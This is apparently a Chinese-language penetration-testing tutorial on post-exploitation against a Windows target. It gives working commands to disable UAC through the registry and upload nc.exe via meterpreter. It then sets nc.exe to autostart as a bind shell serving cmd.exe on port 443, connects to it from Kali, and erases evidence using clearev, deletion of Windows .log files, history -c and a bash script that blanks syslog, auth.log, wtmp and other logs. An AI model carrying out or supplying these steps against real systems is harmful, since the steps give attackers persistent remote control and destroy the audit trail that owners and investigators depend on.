需要
- 获取目标机cmd权限
- 关闭 UAC 1.关闭 UAC 远程限制 2.关闭 UAC通知
- 上传nc.exe 并且 设置nc开机启动
- 用kali的nc连接目标
- 清除日志
开始
1. 获取目标机cmd权限
- 通过远峰之蓝获取
2. --进入目标shell-- 关闭UAC 1.关闭 UAC 远程限制 2.关闭 UAC通知
2.1: 关闭 UAC 远程限制
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
2.1: 关闭 UAC通知
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
参数说明
ADD 添加一个注册表项
-v 创建键值
-t 键值类型
-d 键值的值 // 0:关闭uac 1:开启uac
-f 强制修改注册表项
3. 在meterpreter下:上传nc.exe 并且 设置nc开机启动
3.1: 上传 nc.exe
upload /usr/share/windows-binaries/nc.exe C:/windows/system32
upload 上传 download 从目标下载
/usr/share/windows-binaries/nc.exe kali的目录
C:/windows/system32 目标的目录
3.2: 设置nc开机启动
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
meterpreter reg 指令参数:
reg -h # 查看帮助
-k #注册表的路径 -v 键的名称 -d 键值
reg enumkey [-k ] # 枚举注册表的内容
reg createkey [-k ] # 创建注册表项
reg deletekey [-k ] # 删除注册表项
reg setval [-k -v -d ] # 在注册表里添加内容
reg deleteval [-k -v ] # 删除注册表的值
reg queryval [-k -v ] # 查询注册表的值
效果和 cmd 操作注册表是一样的。
Successfully set lltest_nc of REG_SZ.(已成功设置REG_SZ lltest_nc)
4.用kali的nc连接目标
nc -v 192.168.0.107 443
成功 OK
nc 参数解释:‘C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe’
L 用户退出后重新进行端口侦听
d 后台运行
p 指定端口
-e 连接后执行的程序
5. 清除日志
第一种
meterpreter > clearev
第二种
C:\Windows\system32>del %WINDIR%\*.log /a/s/q/f
第三种
root > history -c
汇总脚本
root@xuegod53:~# cat clog.sh
#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
history -c
执行时注意文件是否有执行权限。而且删除日志一般只有 root 权限才可以。
win7查看日志